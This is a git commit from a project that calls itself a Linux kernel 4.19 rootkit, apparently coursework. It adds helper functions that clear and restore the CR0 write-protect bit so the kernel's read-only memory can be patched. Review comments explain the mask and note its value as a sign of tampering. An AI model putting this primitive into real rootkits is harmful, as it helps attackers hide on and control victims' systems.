linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit c8017b40cad263e1f9afe9c8a7620499f3fa5e23
parent 903ef79c132e3a913ee1873cea51522413c18445
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 20 Nov 2020 16:59:10 +0100

adds initial hooks code

Diffstat:
Asrc/hook.c | 16++++++++++++++++
Asrc/hook.h | 8++++++++
2 files changed, 24 insertions(+), 0 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -0,0 +1,16 @@
+#include <linux/kallsyms.h>
+
+#include "hook.h"
+
+
+void
+disable_protection(void)
+{
+ write_cr0(read_cr0() & (~0x10000));
+}
+
+void
+enable_protection(void)
+{
+ write_cr0(read_cr0() | 0x10000);
+}
diff --git a/src/hook.h b/src/hook.h
@@ -0,0 +1,8 @@
+#ifndef _GROUP7_HOOK_H
+#define _GROUP7_HOOK_H
+
+void disable_protection(void);
+void enable_protection(void);
+
+
+#endif//_GROUP7_HOOK_H
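Review bot: The mask `0x10000` in disable_protection and enable_protection is an unexplained magic number; it is bit 16 of CR0, the Write Protect flag, which the x86 kernel headers name `X86_CR0_WP`, and neither function says so. A comment such as `/* clears CR0.WP: ring-0 writes to read-only pages no longer fault on the CPU that executes this */` above disable_protection would state the security effect for anyone auditing or analysing the module. For defenders, a loadable module that clears this bit is a strong indicator of tampering with kernel text or read-only data. Mainline kernels newer than the 4.19 target pin the bit inside `write_cr0`, as far as I know, so this should be checked against the kernel actually in use. The only system header included is `<linux/kallsyms.h>`, which nothing in this file uses, so `read_cr0`/`write_cr0` are presumably reached through a transitive include.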
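Review bot: The include guard `_GROUP7_HOOK_H` in src/hook.h starts with an underscore followed by an uppercase letter, a form C reserves for the implementation; `GROUP7_HOOK_H` avoids the clash. The two prototypes are also undocumented; a one-line comment stating that they clear and restore CR0 write protection would let a reader see the security effect from the header without opening hook.c.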